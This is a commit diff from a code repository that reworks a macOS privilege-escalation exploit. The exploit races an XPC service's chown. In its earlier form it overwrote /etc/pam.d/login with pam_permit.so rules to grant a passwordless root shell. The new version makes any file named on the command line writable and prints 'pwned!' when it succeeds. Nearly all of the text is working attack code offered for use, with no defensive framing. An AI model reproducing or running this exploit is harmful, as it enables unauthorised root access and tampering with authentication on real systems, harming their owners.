getroot -> make writable
This commit is contained in:
Tim W
+1
-1
@@ -2,7 +2,7 @@ TARGET := exploit
|
||||
|
||||
all: $(TARGET)
|
||||
|
||||
$(TARGET): main.c getroot.m
|
||||
$(TARGET): exploit.m
|
||||
$(CC) -o $@ $^
|
||||
|
||||
clean:
|
||||
|
||||
Vendored
+17
-25
@@ -9,8 +9,7 @@
|
||||
#include <xpc/xpc.h>
|
||||
#include <pthread.h>
|
||||
|
||||
// chown(TARGET, USER, group(USER))
|
||||
#define TARGET "/etc/pam.d/login"
|
||||
char *TARGET;
|
||||
char *WRITABLE;
|
||||
char *USER;
|
||||
|
||||
@@ -68,30 +67,14 @@ void exploit() {
|
||||
}
|
||||
|
||||
void *pwn(void *arg) {
|
||||
#define QUOTE(x) #x
|
||||
|
||||
const char* literal =
|
||||
"auth optional pam_permit.so\n"
|
||||
"auth optional pam_permit.so\n"
|
||||
"auth optional pam_permit.so\n"
|
||||
"auth required pam_permit.so\n"
|
||||
"account required pam_permit.so\n"
|
||||
"account required pam_permit.so\n"
|
||||
"password required pam_permit.so\n"
|
||||
"session required pam_permit.so\n"
|
||||
"session required pam_permit.so\n"
|
||||
"session optional pam_permit.so\n";
|
||||
|
||||
while(1) {
|
||||
int fd = open("/etc/pam.d/login", O_CREAT|O_WRONLY|O_TRUNC, 0777);
|
||||
if(fd != -1) {
|
||||
write(fd, literal, strlen(literal));
|
||||
close(fd);
|
||||
puts("pwned! now 'login root' will give you a root shell");
|
||||
int testaccess = access(TARGET, W_OK);
|
||||
if(!testaccess) {
|
||||
printf("pwned! %s is now writable!\n", TARGET);
|
||||
pwned = true;
|
||||
break;
|
||||
} else {
|
||||
perror("open");
|
||||
perror("access");
|
||||
}
|
||||
usleep(1000000);
|
||||
}
|
||||
@@ -109,7 +92,7 @@ connection_handler(xpc_connection_t peer)
|
||||
xpc_connection_resume(peer);
|
||||
}
|
||||
|
||||
void getroot() {
|
||||
void make_writable(char * target) {
|
||||
struct passwd *pw = getpwuid(getuid());
|
||||
if(!pw) {
|
||||
perror("getpwuid");
|
||||
@@ -118,8 +101,7 @@ void getroot() {
|
||||
|
||||
WRITABLE = pw->pw_dir;
|
||||
USER = pw->pw_name;
|
||||
|
||||
printf("User: %s Writable: %s.\n", USER, WRITABLE);
|
||||
TARGET = target;
|
||||
|
||||
setvbuf(stdout, 0, 2, 0);
|
||||
chdir(WRITABLE);
|
||||
@@ -135,3 +117,13 @@ void getroot() {
|
||||
rmdir("!");
|
||||
unlink("!");
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
if (argc < 2) {
|
||||
printf("Usage: %s /file/to/make/writable\n", argv[0]);
|
||||
return -1;
|
||||
}
|
||||
make_writable(argv[1]);
|
||||
return 0;
|
||||
}
|
||||
|
||||
-11
@@ -1,11 +0,0 @@
|
||||
#include <fcntl.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
void getroot();
|
||||
|
||||
int main() {
|
||||
getroot();
|
||||
return 0;
|
||||
}
|
||||
Reference in New Issue
Block a user